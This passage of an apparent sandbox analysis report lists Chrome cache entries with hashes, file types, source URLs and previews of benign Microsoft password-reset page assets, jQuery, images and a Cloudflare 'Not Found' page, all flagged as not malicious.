Preview:	.//------------------------------------------------------------..// Copyright (c) Microsoft Corporation. All rights reserved...//------------------------------------------------------------....var Button = new Object();....Button.ActiveButton = null;..Button.FocusButton = null;..Button.DefaultButton = null;..Button.CancelButton = null;..Button.ActivatedButtonID = null;..Button.Groups = {};....Button.SetText = function(id, text) {.. var button = document.getElementById(id);.. if (button != null) {.. for (var i = 0; i < button.children.length; i++) {.. var ch = button.children[i];.. if (ch.tagName.toLowerCase() == 'span') {.. ch.innerHTML = text; //// TODO: this causes the text wrapped with an <a> tag to get inserted in Firefox, which needs to get fixed... break;.. }.. }.. }.. var span = document.getElementById(id + '_disabled');.. if (span != null) {.. for (var i = 0; i < span.childr

Chrome Cache Entry: 138

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65329), with CRLF line terminators
Category:	downloaded
Size (bytes):	102801
Entropy (8bit):	5.336080509196147
Encrypted:	false
SSDEEP:	1536:MGLiogSomRYvoGtT+KHsVS0bT79DSsi46j/LPyR7kbE:MGLXGFKT79DSs6WCE
MD5:	C89EAA5B28DF1E17376BE71D71649173
SHA1:	2B34DF4C66BB57DE5A24A2EF0896271DFCA4F4CD
SHA-256:	66B804E7A96A87C11E1DD74EA04AC2285DF5AD9043F48046C3E5000114D39B1C
SHA-512:	B73D56304986CD587DA17BEBF21341B450D41861824102CC53885D863B118F6FDF2456B20791B9A7AE56DF91403F342550AF9E46F7401429FBA1D4A15A6BD3C0
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/ScriptResource.axd?d=VIE43fhKYALt1h--NubszP0DFh68HPDckXyrzSzcpFA_hXCKJ1EIb2ceodrO8nlNFYikcdD7n0790BE38WmQUWKqQEN7T9jMfLVBhpy2yfCtJTofgsgJG2llxW01TdSJiCp49QKh3822k9ZEaOyIbDbtN7qH1gIXM5b_iyr9JCxJZ_jcEe5c1Tn_AW5zl8w1T4Wa5FbYQF7_hCwlnYuEw59NQvB2Q1YXwxn2UE12lc81&t=74258c30
Preview:	//----------------------------------------------------------..// Copyright (C) Microsoft Corporation. All rights reserved...//----------------------------------------------------------..// MicrosoftAjax.js..Function.__typeName="Function";Function.__class=true;Function.createCallback=function(b,a){return function(){var e=arguments.length;if(e>0){var d=[];for(var c=0;c<e;c++)d[c]=arguments[c];d[e]=a;return b.apply(this,d)}return b.call(this,a)}};Function.createDelegate=function(a,b){return function(){return b.apply(a,arguments)}};Function.emptyFunction=Function.emptyMethod=function(){};Function.validateParameters=function(c,b,a){return Function._validateParams(c,b,a)};Function._validateParams=function(g,e,c){var a,d=e.length;c=c\|\|typeof c==="undefined";a=Function._validateParameterCount(g,e,c);if(a){a.popStackFrame();return a}for(var b=0,i=g.length;b<i;b++){var f=e[Math.min(b,d-1)],h=f.name;if(f.parameterArray)h+="["+(b-d+1)+"]";else if(!c&&b>=d)break;a=Function._validateParameter(g[b],f

Chrome Cache Entry: 139

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (611)
Category:	downloaded
Size (bytes):	27242
Entropy (8bit):	4.3631679730758375
Encrypted:	false
SSDEEP:	384:6FamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:663Mp5If8WOmgW3
MD5:	DF3D48946E8D3F5A83608308EDBB4B86
SHA1:	47B9C40C97ABF2658DF96B1C06109324E15E1A00
SHA-256:	570A6631252B8A52DF4DE0E953AE77DBDF524DFC3637CDA2840494A0D2B49499
SHA-512:	36EC1CEC72DC3245730C813277C645525473CC5232E85CD23503B8593D90264F335E61A16D364A1E6C41922820B40BA7C0F46B19F4B91DB6A0CF5E31E778DDEA
Malicious:	false
Reputation:	low
URL:	https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/favicon.ico
Preview:	<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr

Chrome Cache Entry: 140

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1561
Entropy (8bit):	7.762338770217686
Encrypted:	false
SSDEEP:	48:c/CeK/fE+XoVldIkPdTWbuf173xX964boBdIhLE:ntcx/Iksbuf17f64borIK
MD5:	8DC34013E911C5F68FC2BCA0400CB06F
SHA1:	16BAFA91AF100D65C4945F04E0C6E1643B98CF00
SHA-256:	795029D360C3D16233FCE96F1BFF13C261535C0885FAE806CFF766F32D96BCEE
SHA-512:	83ACA42A30BFD629BC1E88D3ED154475E7949C1B154D19E6C9EF1DE825BA7967C0B6DA9EE79E7B420668242CCE5931DF344C97278A254F0A72C3D09EABED6051
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...<...<.....:..r....sBIT....\|.d.....pHYs...........S.....tEXtCreation Time.05/06/16...o....tEXtSoftware.Adobe Fireworks CS6.....qIDATh..=l.E.....H..H*.\|... ...&.D..).@....&...N....)_.E ...(.p...p(H...Ht... ..0............i.}s.....{`ss....;.......:...u..."....Az.r.%.9.\|....wU.j...o....N4...~....g.u.=`.;..9.7.%....Ad#......9....~7.....&.a........`]x^D....&,"..kv.l..K.S+!....#{.xm.;..%.+F<.\..#...bN...2...\.".I..U]..#.dWy$."r.2;Z...w)oD..H..u..M.'.k70.<4aG..`'~......k31W.2!Ue.A"..j....X..C...dNUd.... .j.\|c."..../..P.MXD......C`>7Y.K...n.....U..#..^4....Uu...Q.);.`9q.53..n.@.......A6.E,6.-d; ........nl.>..."..N7..9\6.....p^a..4aG...3...gUu#..j...2............f.....^.)...Udo'&..G.C.Z...L).....".t...pCD..n..a.....E....F...o.k.Y+b...[...gT..... ...]....V..m.!\..SCwh8w..J^.3N........\.W.....3.....lP.Da........-..........@_...i......r..%..)E.Q...3..M..o.$...`...".......-/EHIDZ.q.MC.......D.Q..".. ..#...................1...p.x?dKP.=...{u\.

Chrome Cache Entry: 141

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	24038
Entropy (8bit):	5.992474931914016
Encrypted:	false
SSDEEP:	384:cLU4fKWVUvyZk56/1+fZfMj8hTb5nz0bnOWWWWWWWWWWWWWWWWWWWWWWWWWqvESs:cLxfKW6yZk8/iZfMjYxnzonm9MaKcuwW
MD5:	877784A5F5808CEFA2B61E73BFCF8EAE
SHA1:	6A0E7EDA2734D7BBBA3CE38D37B347DF001B1DBF
SHA-256:	BE7F0632337BC381D4962125545A5CC3C1E84E2D03DBDB97AB3D79AD78B91B6D
SHA-512:	DABFFC928F7ED2A2D05003DAEF643806BD1CEC6B98E705F7415A82AFE7034F4E1E8A70C5AE69B094A948EEDAB4E8B76DCF72DF881DA092FE4AB76DA0EEFB8C3C
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/favicon.ico?v=1342177280
Preview:	......@@.... .(@..F... .... .(...n@........ .(....P........ .(....Y..(...@......... ............................................................W.X..~S...W...X...X...X..X..V..p...}.............................................................kQ.W*..S$..wK..k..k..k..m..m..p..q..q..r..~......".........................................................................t..s'..^...\...^..._..._...`...a...b...e....M.................................................................fF.^...sB...m...v...w...x...x...y...{...{............%...#..."..."... ......................................................................v.._..xL...V...X...X...Y...Z...Z...\...`..}N...k#....................................................................rO4.Y+...T...k...q...q...p...q...q...u...}...."...$... .................................................................................j...S...T...X...Z...Y...Z...[...Z...]..._..{O...o?...........................................

Chrome Cache Entry: 142

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 17 x 25, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	471
Entropy (8bit):	7.197252382638843
Encrypted:	false
SSDEEP:	12:6v/7eM/H/HTOlHAbsnwpncDR1pxInjqrrgRRIEw6Jz:qHTO0Gwpnc7pOnjqngRR1nJz
MD5:	C651D60A08FF0F579E2EB9BE6043A3C6
SHA1:	E7BCBB896EEA20A4DC68EDD2EF5B336E92690A55
SHA-256:	7B4B6ADAA1DDA648143A18A52B51DFAAB54775BDB6284DFF5C869235CD385230
SHA-512:	017C29423F096A45AD5D1002B2F14E27A8298F144A962B78F46A96626A1027D5E4EC57468CD8F8C5B9E97461FA651452A1786CD9F5F76264652D03F55D516138
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............>.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.Adobe ImageReadyq.e<...GIDAT8O...@...;Wa.`.X....b....... A.F....K...a..t*{3.e...K.....C..0.....)~;.eYvP....L}.KAEQP.4..WYd....mV]..m....$M...`...C.$R.......`..dM.T....,RU..TU..`.'0.!...D[`p..W)D8,dv]Wt....\^v.$.s..`.i...!...D..e$......$.8../..8....;..\6,...f\|....n.....e..M...g.O.9....q..&........0.w...k...z....\.iZ..c.;.F...Uq7.'Y....X ....IEND.B`.

Chrome Cache Entry: 143

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.307354922057605
Encrypted:	false
SSDEEP:	3:RPanSiJm8hRn:RPanSqLhR
MD5:	9AEAFECC1E5618033869C4957F8E2B1D
SHA1:	0E975765FA1B4B930A9BAEA010DB675AEEEB8067
SHA-256:	F7CCDABC5953726E54ED4448F5D5D975A8E406F16BF953E6639FD18D887EF5A2
SHA-512:	9B50A306B3E5021CBA709EE0CE7AA737A62E2C84741B369621A7601E8CE50139A8F4F91059093ED780531262E26D52A1E3F98E36BE91CC993582362E2CDD9408
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmbhFplgsQ8ORIFDVd69_0SBQ3PTlCY?alt=proto
Preview:	ChIKBw1Xevf9GgAKBw3PTlCYGgA=

Chrome Cache Entry: 144

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
Reputation:	low
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 145

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 89 x 18, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1805
Entropy (8bit):	7.265265285391204
Encrypted:	false
SSDEEP:	24:oV1hpunQWwjx82lY2T32HEV8KJyJ3VAyKOGpxbAKJcyIXRP6VEBxX4pAE60KKAU9:4itNn2VMJ3R6breHDBBThFtYeD5B2
MD5:	BC89C1FBFBC227DC5A7ED9B2797E240D
SHA1:	8A9390297FDD0963C466CF2FD35D5B1F88A46B6A
SHA-256:	744A8CD0A4D15DFCF4A5D2E832FF556D950F8AF24D7B66104AB2EF4FE2605D9A
SHA-512:	C18F6B22F4AC5040E3FEBE8034AD3A3A3EF32CF3384BE6C3144B2EB04080F03111743D5B30AF3A1343AFD68A20AAE5972422C724107243D00CD9CF263DDC10C7
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...Y.........0.r.....sRGB.........gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:BABFACAF901511E2BD4FDE5C526470CF" xmpMM:DocumentID="xmp.did:BABFACB0901511E2BD4FDE5C526470CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BABFACAD901511E2BD4FDE5C526470CF" stRef:documentID="xmp.did:BABFACAE901511E2BD4FDE5C526470CF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..R....fIDATXG.mq[1.E.!...3&...P.................3..~L..q.O..t..{...v?..n.....b#.-.i..

Chrome Cache Entry: 146

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 89 x 18, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	1805
Entropy (8bit):	7.265265285391204
Encrypted:	false
SSDEEP:	24:oV1hpunQWwjx82lY2T32HEV8KJyJ3VAyKOGpxbAKJcyIXRP6VEBxX4pAE60KKAU9:4itNn2VMJ3R6breHDBBThFtYeD5B2
MD5:	BC89C1FBFBC227DC5A7ED9B2797E240D
SHA1:	8A9390297FDD0963C466CF2FD35D5B1F88A46B6A
SHA-256:	744A8CD0A4D15DFCF4A5D2E832FF556D950F8AF24D7B66104AB2EF4FE2605D9A
SHA-512:	C18F6B22F4AC5040E3FEBE8034AD3A3A3EF32CF3384BE6C3144B2EB04080F03111743D5B30AF3A1343AFD68A20AAE5972422C724107243D00CD9CF263DDC10C7
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/images/header_Microsoft.png
Preview:	.PNG........IHDR...Y.........0.r.....sRGB.........gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:BABFACAF901511E2BD4FDE5C526470CF" xmpMM:DocumentID="xmp.did:BABFACB0901511E2BD4FDE5C526470CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BABFACAD901511E2BD4FDE5C526470CF" stRef:documentID="xmp.did:BABFACAE901511E2BD4FDE5C526470CF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..R....fIDATXG.mq[1.E.!...3&...P.................3..~L..q.O..t..{...v?..n.....b#.-.i..

Chrome Cache Entry: 147

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12429
Entropy (8bit):	4.880328887313854
Encrypted:	false
SSDEEP:	192:x8GsutherY4/qX0Ii8tPNS3ndq3yFwmLkwjPuqwnESBX3Sri6K4Cl44B6QRguaZ:xBjiUSCDnyQRq
MD5:	A17520454D4A65A399B863B5CC46D3FC
SHA1:	0A02C72D7AFCD5198C590108E7F2302A1F75544D
SHA-256:	62E5E7DC19D018BEDB24E2C89ED41271B9D94A6DDE3359CC9CABBC315385C0E5
SHA-512:	0757698DC40D0AC165F159270375514A543448FB2A3E7B3B70EB500180EA00FDA3A4FC7F77C48EA013C3BAC082C092BB852CF86F7D4C0094596DE6917DCA1449
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/css/Style.css?v=1342177280
Preview:	* {.. line-break: strict..}....body,..input,..select,..textarea,..button,..legend {.. font-weight: normal;.. font-family: "Segoe UI-Regular-final", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. font-size: 12px;.. line-height: 19px;.. letter-spacing: .01em;.. color: #666666..}....span.requiredstar {.. font-weight: normal;.. font-family: "Segoe UI-Regular-final", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. font-size: 12px;.. color: #a80f22..}....h1,..h2,..h3,..h4,..h5,..h6 {.. font-weight: normal;.. font-family: "SegoeUI-Light-final", "Segoe UI Light", "Segoe UI", Segoe, Tahoma, Helvetica, Arial, Sans-Serif;.. color: #333333;.. margin: 0 0 0 0;.. cursor: default..}....h1 {.. font-size: 32px;.. line-height: normal;.. letter-spacing: -.01em;.. padding-left: 0px;.. padding-right: 0px..}....h2 {.. font-size: 22px;.. line-height: normal;.. letter-spacing: -.01em..}....h3 {.. font-size: 13px;

Chrome Cache Entry: 148

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 513
Category:	dropped
Size (bytes):	276
Entropy (8bit):	7.316609873335077
Encrypted:	false
SSDEEP:	6:XtqDFR4m68lkQfanvbEzXI0iP427cnLPw6/aqqmb/:XUD34sMDaXI0demb/
MD5:	4E3510919D29D18EEB6E3E8B2687D2F5
SHA1:	31522A9EC576A462C3F1FFA65C010D4EB77E9A85
SHA-256:	1707BE1284617ACC0A66A14448207214D55C3DA4AAF25854E137E138E089257E
SHA-512:	DFAD29E3CF9E51D1749961B47382A5151B1F3C98DEABF2B63742EB6B7F7743EE9B605D646A730CF3E087D4F07E43107C8A01FF5F68020C7BF933EBA370175682
Malicious:	false
Reputation:	low
Preview:	...........Q=o. ..+.......=t....E.k["...../g;n.,....{.......2....e.......J).8..).5.....>,.ih...^s...&M.Ta..m........C.N5.G.!.-...}.9.~........u.3..@i..qK.U.......E.........S.......A.....6...G..g...,f3g.5F..I...G@<..L.:`.N&.?R....d..(.7._....z.L.......s....

Chrome Cache Entry: 149

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 338 x 72, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	4020
Entropy (8bit):	7.929907559552797
Encrypted:	false
SSDEEP:	96:1X+Yg6Iet+ZpBmQKEuhA/4oJqNoCkQV+CX8h:Fg69t+YfPhEBPnC+t
MD5:	36AFB641BECFAD75FED5F4E6E8C39268
SHA1:	2495652F017B7A06D796AFE9C4A06ECD54F9CCFE
SHA-256:	5C2192A3932CB78B431A1AC0F3F3D73414A31C63D5CB279F2687E58C72694200
SHA-512:	08C27020CF80A181B941EE144090FFBDD12ED34BA8CBEC037ACECE63F850FF8A69BE6DDB0EC24F7141C46F27779ED59AF84A55FB367C1B6F8893B444F44C5AF5
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/images/footer_logo_grey_bg.png
Preview:	.PNG........IHDR...R...H.......}.....pHYs..!8..!8.E.1`....sRGB.........gAMA......a....IIDATx...r....[ZZ..V.'0......].......z....M..U.%........C.....}...s...mIV.O5...... ...U.Hq@b......Y..../)..hy.._S......KzK...O\5EQ...(....B.(......(J ...(.......B.(......(J ...(.......B.(..H..EQ.C...V...7.//...~...?.....h4:.@TH.E....}........k.v....L./.@TH...pGN.;.....'.(s...k.......4GTH...'O.~...g[..o.."....l..>.G...;..~...&.....d..u.^F.........M.h.....>.}>..........[......E.b..?.u..{.B........M._.iAh.>~.<S...=.@`e..e....R....._ViA.E....R.@...@..vm.'Ei.v..\>QD..e..R......;o.p{......./^d..TH;.,F>..6...1?..E.p.}..J.p...XD.........7.^b..../.w...........n0.+R.V).J.a..^.X.S..B(..W+++..W. ..e%"Z.[.{,....JQ.iG`....(5..e..`u.*.=.)J...........C.!.@..;$.i.F...W.[....#............k.(J.z....`.dB..)..-H...R.H..O.#V..%......W.4>.'..aJ9.2Q..+.R..id`.x..1.. .../.(J%..>2d.QJ..7.\|.S`..10>..}.M#.....4......<f}..OWO..m.;C[;u.\|P!......L...S.Egr.....3.k.......i.........O...

Chrome Cache Entry: 150

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 17 x 25, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	471
Entropy (8bit):	7.197252382638843
Encrypted:	false
SSDEEP:	12:6v/7eM/H/HTOlHAbsnwpncDR1pxInjqrrgRRIEw6Jz:qHTO0Gwpnc7pOnjqngRR1nJz
MD5:	C651D60A08FF0F579E2EB9BE6043A3C6
SHA1:	E7BCBB896EEA20A4DC68EDD2EF5B336E92690A55
SHA-256:	7B4B6ADAA1DDA648143A18A52B51DFAAB54775BDB6284DFF5C869235CD385230
SHA-512:	017C29423F096A45AD5D1002B2F14E27A8298F144A962B78F46A96626A1027D5E4EC57468CD8F8C5B9E97461FA651452A1786CD9F5F76264652D03F55D516138
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/images/hip_reload.png
Preview:	.PNG........IHDR..............>.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.Adobe ImageReadyq.e<...GIDAT8O...@...;Wa.`.X....b....... A.F....K...a..t*{3.e...K.....C..0.....)~;.eYvP....L}.KAEQP.4..WYd....mV]..m....$M...`...C.$R.......`..dM.T....,RU..TU..`.'0.!...D[`p..W)D8,dv]Wt....\^v.$.s..`.i...!...D..e$......$.8../..8....;..\6,...f\|....n.....e..M...g.O.9....q..&........0.w...k...z....\.iZ..c.;.F...Uq7.'Y....X ....IEND.B`.

Chrome Cache Entry: 151

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	3651
Entropy (8bit):	4.094801914706141
Encrypted:	false
SSDEEP:	96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
MD5:	EE5C8D9FB6248C938FD0DC19370E90BD
SHA1:	D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256:	04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512:	C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious:	false
Reputation:	low
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

Chrome Cache Entry: 152

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 16 x 25, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	405
Entropy (8bit):	6.927238031773719
Encrypted:	false
SSDEEP:	6:6v/lhPGtyR8R/Chm+jnDs9cCXz6fXIpvI+WOcy0f11VTaENo+7PfW3e37zt1afwp:6v/7SyG/HYfXJOvU1zTa8o+W8
MD5:	D4FFE61373F6AA32EEB8CA7CD41AB980
SHA1:	4925FAC4BC73EFB7C7BBC32B11C435ECF1D61674
SHA-256:	D5C54FFC6B8BD44D932BE8F37B1CD5B666205C7574F9D56EF68E56F83E08FFAD
SHA-512:	0F7EDE96F20BB3C053C246FFE1EF8CE739CEF7757FAAED031A365299B88664A046557C2C7FDB3BADED070BA4EBA1A14950D7E3A066B4976BF07142CEFA48BEEB
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/images/hip_speaker.png
Preview:	.PNG........IHDR.............8.......sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.Adobe ImageReadyq.e<....IDAT8O...0...nf..y.,X4.g.I.h4..H.`.b.bA..f.n....%.=.iS.?N....^....A.(...~.i..m[.Qyz..iB..(...8...<G.........y..$.8....EQ.u]..I..(R.l...a...=..?t...CUU.......-..7.!..@.u0\..y.@..[a...p@.J.......e..>.Y..i..>A...+.,[. X9..z....B.4..+)..`n/..Q..>...y....e<....IEND.B`.

Chrome Cache Entry: 153

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 4 icons, 64x64, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	dropped
Size (bytes):	24038
Entropy (8bit):	5.992474931914016
Encrypted:	false
SSDEEP:	384:cLU4fKWVUvyZk56/1+fZfMj8hTb5nz0bnOWWWWWWWWWWWWWWWWWWWWWWWWWqvESs:cLxfKW6yZk8/iZfMjYxnzonm9MaKcuwW
MD5:	877784A5F5808CEFA2B61E73BFCF8EAE
SHA1:	6A0E7EDA2734D7BBBA3CE38D37B347DF001B1DBF
SHA-256:	BE7F0632337BC381D4962125545A5CC3C1E84E2D03DBDB97AB3D79AD78B91B6D
SHA-512:	DABFFC928F7ED2A2D05003DAEF643806BD1CEC6B98E705F7415A82AFE7034F4E1E8A70C5AE69B094A948EEDAB4E8B76DCF72DF881DA092FE4AB76DA0EEFB8C3C
Malicious:	false
Reputation:	low
Preview:	......@@.... .(@..F... .... .(...n@........ .(....P........ .(....Y..(...@......... ............................................................W.X..~S...W...X...X...X..X..V..p...}.............................................................kQ.W*..S$..wK..k..k..k..m..m..p..q..q..r..~......".........................................................................t..s'..^...\...^..._..._...`...a...b...e....M.................................................................fF.^...sB...m...v...w...x...x...y...{...{............%...#..."..."... ......................................................................v.._..xL...V...X...X...Y...Z...Z...\...`..}N...k#....................................................................rO4.Y+...T...k...q...q...p...q...q...u...}...."...$... .................................................................................j...S...T...X...Z...Y...Z...[...Z...]..._..{O...o?...........................................

Chrome Cache Entry: 154

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1498
Entropy (8bit):	4.81759827491068
Encrypted:	false
SSDEEP:	24:UhvVovixQcvUvED/frfnQYRKYKvZiANncisDmZu7SECywEZS9Y6f:U7ZM8vbA3smgm89CywYkV
MD5:	11FE4E6509513DB245F1F97E37C5D3AB
SHA1:	05322C35B6BFAE84CE8C626BD7B1F8C4A6F15A6D
SHA-256:	78D437B40A85299F96ED9D02E35F23FD3D3EF63D844D8D2523A15516F7E1D09C
SHA-512:	E8A7C3B06C54B671FF6772D6A360DD0B4A65888B4DBD32AE04D14E4971343A71E1B4EC1E58BD45898744A1B0DF4EDE24141FF47E2C0393E18AACFC97E6F10D76
Malicious:	false
Reputation:	low
URL:	https://passwordreset.microsoftonline.com/css/ltrStyle.css?v=1342177280
